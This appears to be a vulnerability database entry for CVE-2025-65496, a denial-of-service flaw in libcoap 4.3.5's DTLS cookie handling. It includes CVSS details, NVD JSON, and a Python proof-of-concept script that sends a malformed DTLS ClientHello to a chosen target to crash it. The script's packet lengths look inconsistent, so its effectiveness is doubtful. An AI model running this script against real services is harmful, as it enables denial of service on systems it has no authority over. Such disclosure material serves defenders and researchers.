CVE-2025-65496

Description

NULL pointer dereference in coap_dtls_generate_cookie() in src/coap_openssl.c in OISM libcoap 4.3.5 allows remote attackers to cause a denial of service via a crafted DTLS handshake that triggers SSL_get_SSL_CTX() to return NULL.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:libcoap:libcoap:4.3.5:-:*:*:*:*:*:* - VULNERABLE

libcoap < 4.3.5 (with specific conditions)

libcoap = 4.3.5 (confirmed affected)

libcoap 4.x.y series with DTLS enabled

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-65496 PoC - libcoap DTLS NULL pointer dereference
This PoC demonstrates sending a malformed DTLS ClientHello to trigger
the NULL pointer dereference in coap_dtls_generate_cookie()
"""

import socket
import struct
import random

def create_dtls_client_hello():
    """Create a malformed DTLS ClientHello packet"""
    # DTLS record layer header
    content_type = 0x16  # Handshake
    version = 0xfeff     # DTLS 1.0 (original)
    epoch = 0x0000
    sequence_number = b'\x00\x00\x00\x00\x00\x01'
    
    # Handshake header
    msg_type = 0x01      # ClientHello
    length = 0x002d      # Message length
    message_seq = 0x0000
    fragment_offset = 0x000000
    fragment_length = 0x002d
    
    # ClientVersion and random
    client_version = 0xfeff  # DTLS 1.0
    gmt_unix_time = struct.pack('>I', random.randint(0, 0xFFFFFFFF))
    random_bytes = bytes(28)
    
    # Session ID (empty)
    session_id = b'\x00'
    
    # Cookie (malformed - trigger NULL ctx)
    cookie = b'\x00'  # Empty or malformed cookie
    
    # Cipher suites
    cipher_suites = b'\x00\x01\x00\x01'  # Minimal cipher list
    
    # Compression methods
    compression = b'\x01\x00'
    
    handshake = struct.pack('>B', msg_type)
    handshake += struct.pack('>I', length)[1:]  # 3 bytes
    handshake += struct.pack('>H', message_seq)
    handshake += struct.pack('>I', fragment_offset)[1:]  # 3 bytes
    handshake += struct.pack('>I', fragment_length)[1:]  # 3 bytes
    handshake += struct.pack('>H', client_version)
    handshake += gmt_unix_time + random_bytes
    handshake += session_id
    handshake += cookie
    handshake += cipher_suites
    handshake += compression
    
    record = struct.pack('>BHH', content_type, version, epoch)
    record += sequence_number
    record += struct.pack('>H', len(handshake))
    record += handshake
    
    return record

def exploit(target_host, target_port=5684):
    """Send malformed DTLS packet to trigger vulnerability"""
    print(f"[*] Target: {target_host}:{target_port}")
    print("[*] Creating malformed DTLS ClientHello...")
    
    payload = create_dtls_client_hello()
    
    print(f"[*] Payload size: {len(payload)} bytes")
    print("[*] Sending malicious DTLS packet...")
    
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(5)
    
    try:
        sock.sendto(payload, (target_host, target_port))
        print("[+] Packet sent successfully")
        print("[*] If vulnerable, target should crash with NULL pointer dereference")
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        sock.close()

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_host> [port]")
        sys.exit(1)
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 5684
    exploit(target, port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-65496
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-65496
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-65496/
[4] VulDB https://vuldb.com/cve/CVE-2025-65496
[5] https://github.com/obgm/libcoap/issues/1745
[6] https://github.com/obgm/libcoap/pull/1750

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-65496", "sourceIdentifier": "[email protected]", "published": "2025-11-24T14:15:47.203", "lastModified": "2025-12-01T17:00:40.420", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NULL pointer dereference in coap_dtls_generate_cookie() in src/coap_openssl.c in OISM libcoap 4.3.5 allows remote attackers to cause a denial of service via a crafted DTLS handshake that triggers SSL_get_SSL_CTX() to return NULL."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libcoap:libcoap:4.3.5:-:*:*:*:*:*:*", "matchCriteriaId": "78120234-9F76-4010-AD0E-FEA4DE8A76F9"}]}]}], "references": [{"url": "https://github.com/obgm/libcoap/issues/1745", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/obgm/libcoap/pull/1750", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}]}}